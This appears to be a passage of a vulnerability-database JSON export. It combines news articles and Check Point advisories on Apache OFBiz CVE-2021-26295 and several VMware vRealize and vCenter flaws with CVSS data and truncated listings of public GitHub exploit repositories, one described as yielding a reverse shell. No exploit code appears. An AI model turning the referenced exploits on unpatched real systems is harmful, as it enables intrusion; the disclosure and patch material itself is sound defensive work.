{"thn": [{"lastseen": "2022-05-09T12:38:25", "description": "[](<https://thehackernews.com/images/-LDB-BP0jSCE/YFhWXTlt8RI/AAAAAAAACE4/4B6vBoblUS0ASitb0c4CfQMec8zUUApdQCLcBGAsYHQ/s0/apche-erp-software.jpg>)\n\nThe Apache Software Foundation on Friday addressed a high severity vulnerability in Apache OFBiz that could have allowed an unauthenticated adversary to remotely seize control of the open-source enterprise resource planning (ERP) system.\n\nTracked as [CVE-2021-26295](<https://issues.apache.org/jira/browse/OFBIZ-12167>), the flaw affects all versions of the software prior to [17.12.06](<https://issues.apache.org/jira/browse/OFBIZ-12195?jql=project%20%3D%20OFBIZ%20AND%20fixVersion%20%3D%2017.12.06>) and employs an \"unsafe deserialization\" as an attack vector to permit unauthorized remote attackers to execute arbitrary code on a server directly.\n\n[OFBiz](<https://en.wikipedia.org/wiki/Apache_OFBiz>) is a Java-based web framework for automating enterprise processes and offers a wide range of functionality, including accounting, customer relationship management, manufacturing operations management, order management, supply chain fulfillment, and warehouse management system, among others.\n\nSpecifically, by exploiting this flaw, a malicious party can tamper with serialized data to insert arbitrary code that, when deserialized, can potentially result in remote code execution.\n\n\"An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz,\" OFBiz developer Jacques Le Roux [noted](<https://seclists.org/oss-sec/2021/q1/255>).\n\nUnsafe deserialization has been a [source of data integrity](<https://snyk.io/blog/serialization-and-deserialization-in-java/>) and other security issues, with the Open Web Application Security Project (OWASP) [noting](<https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data>) that \"data which is untrusted cannot be trusted to be well formed, [and that] malformed data or 
unexpected data could be used to abuse application logic, deny service, or execute arbitrary code, when deserialized.\"\n\nr00t4dm at Cloud-Penetrating Arrow Lab, MagicZero from SGLAB of Legendsec at Qi'anxin Group, and Longofo at Knownsec 404 Team have been credited with reporting the vulnerability.\n\nIt's recommended to upgrade Apache OFBiz to the [latest version](<https://ofbiz.apache.org/download.html>) (17.12.06) to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T08:34:00", "type": "thn", "title": "Critical RCE Vulnerability Found in Apache OFBiz ERP Software\u2014Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-03-22T08:34:44", "id": "THN:6E0EE4DB2DB83F27194AFC50774789BB", "href": 
"https://thehackernews.com/2021/03/critical-rce-vulnerability-found-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:23", "description": "[](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the 
underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-07T08:03:00", "type": "thn", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "modified": "2021-04-07T09:38:17", "id": "THN:4640BEB83FE3611B6867B05878F52F0D", "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:17", "description": "[](<https://thehackernews.com/images/-EJ9u76MmCUI/YUqeTrQNNsI/AAAAAAAAD2Q/9-DR1JzBdMUg23AZ7ggcnbJqj4DkD4piQCLcBGAsYHQ/s0/vmware-patch-update.jpg>)\n\nVMware on Tuesday published a new bulletin warning of as many as 19 vulnerabilities in vCenter Server and Cloud Foundation appliances that a remote attacker could exploit to take 
control of an affected system.\n\nThe most urgent among them is an arbitrary file upload vulnerability in the Analytics service (CVE-2021-22005) that impacts vCenter Server 6.7 and 7.0 deployments. \"A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file,\" the company [noted](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), [adding](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) \"this vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.\"\n\nAlthough VMware has published [workarounds](<https://kb.vmware.com/s/article/85717>) for the flaw, the company cautioned that they are \"meant to be a temporary solution until updates [\u2026] can be deployed.\"\n\nThe complete list of flaws patched by the virtualization services provider is as follows \u2014\n\n * **CVE-2021-22005** (CVSS score: 9.8) - vCenter Server file upload vulnerability\n * **CVE-2021-21991** (CVSS score: 8.8) - vCenter Server local privilege escalation vulnerability\n * **CVE-2021-22006** (CVSS score: 8.3) - vCenter Server reverse proxy bypass vulnerability\n * **CVE-2021-22011** (CVSS score: 8.1) - vCenter server unauthenticated API endpoint vulnerability\n * **CVE-2021-22015** (CVSS score: 7.8) - vCenter Server improper permission local privilege escalation vulnerabilities\n * **CVE-2021-22012** (CVSS score: 7.5) - vCenter Server unauthenticated API information disclosure vulnerability\n * **CVE-2021-22013** (CVSS score: 7.5) - vCenter Server file path traversal vulnerability\n * **CVE-2021-22016** (CVSS score: 7.5) - vCenter Server reflected XSS vulnerability\n * **CVE-2021-22017** (CVSS score: 7.3) - vCenter Server rhttpproxy bypass vulnerability\n * **CVE-2021-22014** (CVSS score: 7.2) - vCenter Server authenticated code execution 
vulnerability\n * **CVE-2021-22018** (CVSS score: 6.5) - vCenter Server file deletion vulnerability\n * **CVE-2021-21992** (CVSS score: 6.5) - vCenter Server XML parsing denial-of-service vulnerability\n * **CVE-2021-22007** (CVSS score: 5.5) - vCenter Server local information disclosure vulnerability\n * **CVE-2021-22019** (CVSS score: 5.3) - vCenter Server denial of service vulnerability\n * **CVE-2021-22009** (CVSS score: 5.3) - vCenter Server VAPI multiple denial of service vulnerabilities\n * **CVE-2021-22010** (CVSS score: 5.3) - vCenter Server VPXD denial of service vulnerability\n * **CVE-2021-22008** (CVSS score: 5.3) - vCenter Server information disclosure vulnerability\n * **CVE-2021-22020** (CVSS score: 5.0) - vCenter Server Analytics service denial-of-service vulnerability\n * **CVE-2021-21993** (CVSS score: 4.3) - vCenter Server SSRF vulnerability\n\nCredited with reporting most of the flaws are George Noseevich and Sergey Gerasimov of SolidLab LLC, alongside Hynek Petrak of Schneider Electric, Yuval Lazar of Pentera, and Osama Alaa of Malcrove.\n\n\"The ramifications of [CVE-2021-22005] are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available,\" VMware [said](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) in an FAQ urging customers to immediately update their vCenter installations.\n\n\"With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spear-phishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\" the company added.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T03:09:00", "type": "thn", "title": "VMware Warns of Critical File Upload Vulnerability Affecting vCenter Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22012", "CVE-2021-22013", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22018", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2021-09-22T03:22:09", "id": "THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "href": "https://thehackernews.com/2021/09/vmware-warns-of-critical-file-upload.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:18", "description": "An 
insecure deserialization vulnerability exists in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "checkpoint_advisories", "title": "Apache OFBiz Insecure Deserialization(CVE-2021-26295)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-28T00:00:00", "id": "CPAI-2021-0267", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:34:20", "description": "An insecure deserialization vulnerability exists in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests. 
A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-12T00:00:00", "type": "checkpoint_advisories", "title": "Apache OFBiz Insecure Deserialization (CVE-2021-26295)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-06-20T00:00:00", "id": "CPAI-2021-0245", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-23T23:31:36", "description": "A server-side request forgery vulnerability exists in VMware vRealize Operations Manager. 
Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:32:54", "description": "An arbitrary file upload vulnerability exists in VMWare vCenter Server. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-27T00:00:00", "type": "checkpoint_advisories", "title": "VMWare vCenter Server Arbitrary File Upload (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T00:00:00", "id": "CPAI-2021-0728", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-07-20T11:31:08", "description": "# CVE-2021-26295-POC\r\n\r\n\u5229\u7528DNSlog\u8fdb\u884cCVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T15:25:01", "type": 
"githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2022-07-20T07:41:03", "id": "DFD57FC3-633C-5613-9AAB-EFE75EBB4A9C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-14T03:35:58", "description": "# CVE-2021-26295-Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T08:25:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-26295"], "modified": "2022-01-13T12:15:38", "id": "C43D1529-7393-5DA8-AEA7-4ED3D87FB150", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:39:41", "description": "# Apache OFBiz rmi\u53cd\u5e8f\u5217\u5316EXP(CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T10:10:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-12-15T14:41:52", "id": "6259E530-C5D5-5A0A-8EDD-D07ADFD93494", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:37:39", "description": "# CVE-2021-26295\n\n**CVE-2021-26295 EXP \u53ef\u6210\u529f\u53cd\u5f39Shell**\n\n> **\u672c\u6587\u4ee5\u53ca\u5de5\u5177\u4ec5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T10:08:54", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-12-15T14:41:43", "id": "44857A61-F0F0-54D6-AB53-4F157029BBC2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to 
